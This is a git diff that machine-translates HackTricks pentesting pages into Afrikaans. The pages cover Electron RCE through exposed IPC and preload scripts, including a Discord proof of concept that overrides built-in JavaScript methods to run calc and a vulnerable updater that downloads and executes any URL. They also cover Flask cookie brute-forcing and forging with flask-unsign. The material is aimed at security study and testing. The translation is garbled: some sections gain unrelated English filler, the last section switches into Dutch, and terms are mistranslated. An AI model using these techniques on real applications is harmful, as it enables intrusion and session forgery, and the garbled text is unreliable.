 process.on('exit', function (){
-    for (let p in cachedArchives) {
-        if (!hasProp.call(cachedArchives, p)) continue
-        cachedArchives[p].destroy()
-    }
+for (let p in cachedArchives) {
+if (!hasProp.call(cachedArchives, p)) continue
+cachedArchives[p].destroy()
+}
 })
 ```
-
 {% embed url="https://github.com/electron/electron/blob/664c184fcb98bb5b4b6b569553e7f7339d3ba4c5/lib/common/asar.js#L30-L36" %}
 
 ![](<../../../.gitbook/assets/image (664).png>)
 
-https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/bin/events.js#L156-L231 -- No longer exists
+https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/bin/events.js#L156-L231 -- Bestaan nie meer nie
 
-Then it goes here:
+Dan gaan dit hier:
 
 ![](<../../../.gitbook/assets/image (647).png>)
 
-Where "self" is Node's process object:
+Waar "self" Node se prosesobjek is:
 
 ![](<../../../.gitbook/assets/image (652) (1).png>)
 
-The process object has a references to "require" function:
-
+Die prosesobjek het 'n verwysing na die "require" funksie:
 ```
 process.mainModule.require
 ```
-
-As the handler.call is going to receive the process object we can overwrite it to execute arbitrary code:
-
+Aangesien die handler.call die process objek gaan ontvang, kan ons dit oorskryf om willekeurige kode uit te voer:
 ```html
 
 ```
+## Voorbeeld 2
 
-## Example 2
+Kry die **vereis voorwerp vanaf prototipe besoedeling**. Vanaf [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
 
-Get **require object from prototype pollution**. From [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
-
-Leak:
+Lek:
 
 

 
-Exploit:
+Exploiteer:
 
 

 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Werk jy in 'n **cybersecurity maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 

diff --git a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md
index 3032340a4..6f4524a40 100644
--- a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md
+++ b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md
@@ -1,125 +1,112 @@
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

 
 
-If the preload script exposes an IPC endpoint from the main.js file, the renderer process will be able to access it and if vulnerable, a RCE might be possible.
+As die preload-skrip 'n IPC-eindpunt van die main.js-lêer blootstel, sal die renderer-proses daartoe toegang hê en as dit kwesbaar is, kan 'n RCE moontlik wees.
 
-**All these examples were taken from here** [**https://www.youtube.com/watch?v=xILfQGkLXQo**](https://www.youtube.com/watch?v=xILfQGkLXQo). Check the video for further information.
+**Al hierdie voorbeelde is geneem vanaf hier** [**https://www.youtube.com/watch?v=xILfQGkLXQo**](https://www.youtube.com/watch?v=xILfQGkLXQo). Kyk na die video vir verdere inligting.
 
-# Example 1
-
-Check how the `main.js` listens on `getUpdate` and will **download and execute any URL** passed.\
-Check also how `preload.js` **exposes any IPC** event from main.
+# Voorbeeld 1
 
+Kyk hoe die `main.js` luister na `getUpdate` en sal **enige URL aflaai en uitvoer** wat oorgedra word.\
+Kyk ook hoe `preload.js` **enige IPC-gebeurtenis** vanaf die hoofbron blootstel.
 ```javascript
 // Part of code of main.js
 ipcMain.on('getUpdate', (event, url) => {
-	console.log('getUpdate: ' + url)
-	mainWindow.webContents.downloadURL(url)
-	mainWindow.download_url = url
+console.log('getUpdate: ' + url)
+mainWindow.webContents.downloadURL(url)
+mainWindow.download_url = url
 });
-  
+
 mainWindow.webContents.session.on('will-download', (event, item, webContents) => {
-	console.log('downloads path=' + app.getPath('downloads'))
-	console.log('mainWindow.download_url=' + mainWindow.download_url);
-	url_parts = mainWindow.download_url.split('/')
-	filename = url_parts[url_parts.length-1]
-	mainWindow.downloadPath = app.getPath('downloads') + '/' + filename
-	console.log('downloadPath=' + mainWindow.downloadPath)
-	// Set the save path, making Electron not to prompt a save dialog.
-	item.setSavePath(mainWindow.downloadPath)
+console.log('downloads path=' + app.getPath('downloads'))
+console.log('mainWindow.download_url=' + mainWindow.download_url);
+url_parts = mainWindow.download_url.split('/')
+filename = url_parts[url_parts.length-1]
+mainWindow.downloadPath = app.getPath('downloads') + '/' + filename
+console.log('downloadPath=' + mainWindow.downloadPath)
+// Set the save path, making Electron not to prompt a save dialog.
+item.setSavePath(mainWindow.downloadPath)
 
-	item.on('updated', (event, state) => {
-		if (state === 'interrupted') {
-			console.log('Download is interrupted but can be resumed')
-		}
-		else if (state === 'progressing') {
-			if (item.isPaused()) console.log('Download is paused')
-			else console.log(`Received bytes: ${item.getReceivedBytes()}`)
-		}
-	})
+item.on('updated', (event, state) => {
+if (state === 'interrupted') {
+console.log('Download is interrupted but can be resumed')
+}
+else if (state === 'progressing') {
+if (item.isPaused()) console.log('Download is paused')
+else console.log(`Received bytes: ${item.getReceivedBytes()}`)
+}
+})
 
-	item.once('done', (event, state) => {
-		if (state === 'completed') {
-			console.log('Download successful, running update')
-			fs.chmodSync(mainWindow.downloadPath, 0755);
-			var child = require('child_process').execFile;
-			child(mainWindow.downloadPath, function(err, data) {
-				if (err) { console.error(err); return; }
-				console.log(data.toString());
-			});
-      			}
-		else console.log(`Download failed: ${state}`)
-	})
-}) 
+item.once('done', (event, state) => {
+if (state === 'completed') {
+console.log('Download successful, running update')
+fs.chmodSync(mainWindow.downloadPath, 0755);
+var child = require('child_process').execFile;
+child(mainWindow.downloadPath, function(err, data) {
+if (err) { console.error(err); return; }
+console.log(data.toString());
+});
+}
+else console.log(`Download failed: ${state}`)
+})
+})
 ```
 
 ```javascript
 // Part of code of preload.js
 window.electronSend = (event, data) => {
-	ipcRenderer.send(event, data);
+ipcRenderer.send(event, data);
 };
 ```
-
-Exploit:
-
+Uitbuiting:
 ```html
 
 ```
+# Voorbeeld 2
 
-# Example 2
-
-If the preload script exposes directly to the renderer a way t call shell.openExternal its possible to obtains RCE
-
+As die preload-skrip direk aan die renderer 'n manier bied om shell.openExternal te roep, is dit moontlik om RCE te verkry.
 ```javascript
 // Part of preload.js code
 window.electronOpenInBrowser = (url) => {
-	shell.openExternal(url);
+shell.openExternal(url);
 };
 ```
+# Voorbeeld 3
 
-# Example 3
-
-Is the preload script exposes ways to completely communicate with the main process, an XSS will be able to send any event. The impact of this depends on what the main process exposes in terms of IPC.
-
+As die preload-skrip maniere blootstel om volledig met die hoofproses te kommunikeer, sal 'n XSS in staat wees om enige gebeurtenis te stuur. Die impak hiervan hang af van wat die hoofproses blootstel in terme van IPC.
 ```javascript
 window.electronListen = (event, cb) => {
-	ipcRenderer.on(event, cb);
+ipcRenderer.on(event, cb);
 };
 
 window.electronSend = (event, data) => {
-	ipcRenderer.send(event, data);
+ipcRenderer.send(event, data);
 };
 ```
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
 
 

-
-
diff --git a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md
index dc30b5291..baadbc49d 100644
--- a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md
+++ b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md
@@ -1,97 +1,89 @@
-# Electron contextIsolation RCE via preload code
+# Elektron contextIsolation RCE via preload-kode
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

 
-## Example 1
+## Voorbeeld 1
 
-Example from [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=30](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=30)
+Voorbeeld vanaf [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=30](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=30)
 
-This code open http(s) links with default browser:
+Hierdie kode open http(s)-skakels met die verstekblaaier:
 
 ![](<../../../.gitbook/assets/image (375) (1) (1).png>)
 
-Something like `file:///C:/Windows/systemd32/calc.exe` could be used to execute a calc, the `SAFE_PROTOCOLS.indexOf` is preventing it.
-
-Therefore, an attacker could inject this JS code via the XSS or arbitrary page navigation:
+Iets soos `file:///C:/Windows/systemd32/calc.exe` kan gebruik word om 'n sakrekenaar uit te voer, die `SAFE_PROTOCOLS.indexOf` voorkom dit.
 
+Daarom kan 'n aanvaller hierdie JS-kode inspuit deur middel van XSS of willekeurige bladsynavigasie:
 ```html
 
 ```
-
-As the call to `SAFE_PROTOCOLS.indexOf` will return 1337 always, the attacker can bypass the protection and execute the calc. Final exploit:
-
+Soos die oproep na `SAFE_PROTOCOLS.indexOf` altyd 1337 sal teruggee, kan die aanvaller die beskerming omseil en die rekenaar uitvoer. Finale aanval:
 ```html
 
 CLICK
 ```
+Kyk na die oorspronklike dia's vir ander maniere om programme uit te voer sonder om toestemming te vra.
 
-Check the original slides for other ways to execute programs without having a prompt asking for permissions.
+Blykbaar is daar 'n ander manier om kode te laai en uit te voer deur iets soos `file://127.0.0.1/electron/rce.jar` te benader.
 
-Apparently another way to load and execute code is to access something like `file://127.0.0.1/electron/rce.jar`
+## Voorbeeld 2: Discord App RCE
 
-## Example 2: Discord App RCE
+Voorbeeld vanaf [https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1](https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1)
 
-Example from [https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1](https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1)
-
-When checking the preload scripts, I found that Discord exposes the function, which allows some allowed modules to be called via `DiscordNative.nativeModules.requireModule('MODULE-NAME')`, into the web page.\
-Here, I couldn't use modules that can be used for RCE directly, such as _child\_process_ module, but I **found a code where RCE can be achieved by overriding the JavaScript built-in methods** and interfering with the execution of the exposed module.
-
-The following is the PoC. I was able to confirm that the **calc** application is **popped** up when I c**all the `getGPUDriverVersions` function** which is defined in the module called "_discord\_utils_" from devTools, while **overriding the `RegExp.prototype.test` and `Array.prototype.join`**.
+Toe ek die preload-skripte nagaan, het ek gevind dat Discord die funksie blootstel wat dit moontlik maak om sekere toegelate modules te roep deur middel van `DiscordNative.nativeModules.requireModule('MODULE-NAME')` in die webbladsy.\
+Hier kon ek nie modules gebruik wat direk vir RCE gebruik kan word nie, soos die _child\_process_ module, maar ek **het 'n kode gevind waar RCE bereik kan word deur die oorskrywing van die ingeboude JavaScript-metodes** en die inmenging met die uitvoering van die blootgestelde module.
 
+Die volgende is die PoC. Ek kon bevestig dat die **calc**-toepassing **verskyn** wanneer ek die `getGPUDriverVersions`-funksie roep wat in die module genaamd "_discord\_utils_" gedefinieer is vanaf devTools, terwyl ek **die `RegExp.prototype.test` en `Array.prototype.join` oorskryf**.
 ```javascript
 RegExp.prototype.test=function(){
-    return false;
+return false;
 }
 Array.prototype.join=function(){
-    return "calc";
+return "calc";
 }
 DiscordNative.nativeModules.requireModule('discord_utils').getGPUDriverVersions();
 ```
-
-The `getGPUDriverVersions` function tries to execute the program by using the "_execa_" library, like the following:
-
+Die `getGPUDriverVersions` funksie probeer om die program uit te voer deur die "_execa_" biblioteek te gebruik, soos die volgende:
 ```javascript
 module.exports.getGPUDriverVersions = async () => {
-  if (process.platform !== 'win32') {
-    return {};
-  }
+if (process.platform !== 'win32') {
+return {};
+}
 
-  const result = {};
-  const nvidiaSmiPath = `${process.env['ProgramW6432']}/NVIDIA Corporation/NVSMI/nvidia-smi.exe`;
+const result = {};
+const nvidiaSmiPath = `${process.env['ProgramW6432']}/NVIDIA Corporation/NVSMI/nvidia-smi.exe`;
 
-  try {
-    result.nvidia = parseNvidiaSmiOutput(await execa(nvidiaSmiPath, []));
-  } catch (e) {
-    result.nvidia = {error: e.toString()};
-  }
+try {
+result.nvidia = parseNvidiaSmiOutput(await execa(nvidiaSmiPath, []));
+} catch (e) {
+result.nvidia = {error: e.toString()};
+}
 
-  return result;
+return result;
 };
 ```
+Gewoonlik probeer die _execa_ om "_nvidia-smi.exe_" uit te voer, wat gespesifiseer word in die `nvidiaSmiPath` veranderlike, maar as gevolg van die oorskryf van `RegExp.prototype.test` en `Array.prototype.join`, **word die argument vervang deur "**_**calc**_**" in die interne verwerking van \_execa**\_**.
 
-Usually the _execa_ tries to execute "_nvidia-smi.exe_", which is specified in the `nvidiaSmiPath` variable, however, due to the overridden `RegExp.prototype.test` and `Array.prototype.join`, **the argument is replaced to "**_**calc**_**" in the \_execa**\_**'s internal processing**.
-
-Specifically, the argument is replaced by changing the following two parts.
+Spesifiek word die argument vervang deur die volgende twee dele te verander.
 
 [https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L36](https://github.com/moxystudio/node-cross-spawn/blob/16feb534e818668594fd530b113a028c0c06bddc/lib/parse.js#L36)
 
@@ -99,14 +91,14 @@ Specifically, the argument is replaced by changing the following two parts.
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

diff --git a/network-services-pentesting/pentesting-web/flask.md b/network-services-pentesting/pentesting-web/flask.md
index 5dc842256..5123f37c5 100644
--- a/network-services-pentesting/pentesting-web/flask.md
+++ b/network-services-pentesting/pentesting-web/flask.md
@@ -2,105 +2,135 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
 

 
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
+Kry vandag toegang:
 
 {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
 
-**Probably if you are playing a CTF a Flask application will be related to** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/)**.**
+**Waarskynlik, as jy 'n CTF speel, sal 'n Flask-toepassing verband hou met** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/)**.**
 
-## Cookies
+## Koekies
 
-Default cookie session name is **`session`**.
+Die verstek koekiesessienaam is **`session`**.
 
 ### Decoder
 
-Online Flask coockies decoder: [https://www.kirsle.net/wizards/flask-session.cgi](https://www.kirsle.net/wizards/flask-session.cgi)
+Aanlyn Flask-koekiesontleder: [https://www.kirsle.net/wizards/flask-session.cgi](https://www.kirsle.net/wizards/flask-session.cgi)
 
-#### Manual
-
-Get the first part of the cookie until the first point and Base64 decode it>
+#### Handleiding
 
+Kry die eerste deel van die koekie tot by die eerste punt en dekodeer dit met Base64>
 ```bash
 echo "ImhlbGxvIg" | base64 -d
 ```
-
-The cookie is also signed using a password
+Die koekie word ook onderteken met behulp van 'n wagwoord
 
 ### **Flask-Unsign**
 
-Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.
+Opdraglyninstrument om sessiekoekies van 'n Flask-toepassing te haal, te ontsyfer, te kragteloos te maak en te skep deur geheime sleutels te raai.
 
 {% embed url="https://pypi.org/project/flask-unsign/" %}
-
 ```bash
 pip3 install flask-unsign
 ```
+#### **Dekodeer Koekie**
 
-#### **Decode Cookie**
+To decode a Flask cookie, you can use the `itsdangerous` library. This library provides a `URLSafeSerializer` class that allows you to serialize and deserialize data in a secure way.
 
+Here's an example of how you can decode a Flask cookie using `itsdangerous`:
+
+```python
+from itsdangerous import URLSafeSerializer
+
+def decode_cookie(cookie_value, secret_key):
+    serializer = URLSafeSerializer(secret_key)
+    try:
+        decoded_data = serializer.loads(cookie_value)
+        return decoded_data
+    except Exception as e:
+        print(f"Error decoding cookie: {e}")
+        return None
+```
+
+In the code above, the `decode_cookie` function takes the cookie value and the secret key as parameters. It creates an instance of the `URLSafeSerializer` class with the secret key, and then uses the `loads` method to decode the cookie value. If an error occurs during the decoding process, it will print an error message and return `None`.
+
+Remember to replace `secret_key` with the actual secret key used to sign the cookie.
+
+You can use this function to decode Flask cookies and extract the data stored in them. However, keep in mind that decoding a cookie does not guarantee the integrity or authenticity of the data. It is always recommended to validate and sanitize the data before using it.
 ```bash
 flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'
 ```
-
 #### **Brute Force**
 
+#### **Brute Krag**
 ```bash
 flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '' --no-literal-eval
 ```
+#### **Ondertekening**
 
-#### **Signing**
+Signing is a process used to ensure the integrity and authenticity of data. In the context of web applications, signing is often used to prevent tampering with data sent between the client and the server.
 
+Ondertekening is 'n proses wat gebruik word om die integriteit en egtheid van data te verseker. In die konteks van webtoepassings word ondertekening dikwels gebruik om te voorkom dat data wat tussen die kliënt en die bediener gestuur word, gewysig word.
+
+When a client sends a request to the server, the server can sign the response using a secret key. This signature is then sent back to the client along with the response. The client can verify the integrity of the response by recalculating the signature using the same secret key and comparing it to the received signature.
+
+Wanneer 'n kliënt 'n versoek na die bediener stuur, kan die bediener die antwoord onderteken deur 'n geheime sleutel te gebruik. Hierdie handtekening word dan saam met die antwoord terug na die kliënt gestuur. Die kliënt kan die integriteit van die antwoord verifieer deur die handtekening opnuut te bereken met dieselfde geheime sleutel en dit te vergelyk met die ontvangde handtekening.
+
+Signing can also be used to authenticate the source of the data. By using a secret key known only to the server, the client can trust that the response came from the legitimate server and has not been tampered with.
+
+Ondertekening kan ook gebruik word om die bron van die data te verifieer. Deur 'n geheime sleutel te gebruik wat slegs aan die bediener bekend is, kan die kliënt vertrou dat die antwoord van die regmatige bediener afkomstig is en nie gewysig is nie.
 ```bash
 flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'
 ```
+#### Ondertekening met behulp van oude (verouderde versies)
 
-#### Signing using legacy (old versions)
+In sommige gevallen kan het nodig zijn om een applicatie te hacken die gebruikmaakt van een verouderde versie van Flask. Deze oudere versies kunnen kwetsbaarheden bevatten die kunnen worden misbruikt om toegang te krijgen tot de applicatie.
 
+Een van de mogelijke aanvalstechnieken is het ondertekenen van gegevens met behulp van een verouderde versie van Flask. Deze techniek maakt gebruik van een zwakke handtekeningmethode die kan worden misbruikt om de handtekening te vervalsen en ongeautoriseerde toegang te verkrijgen.
+
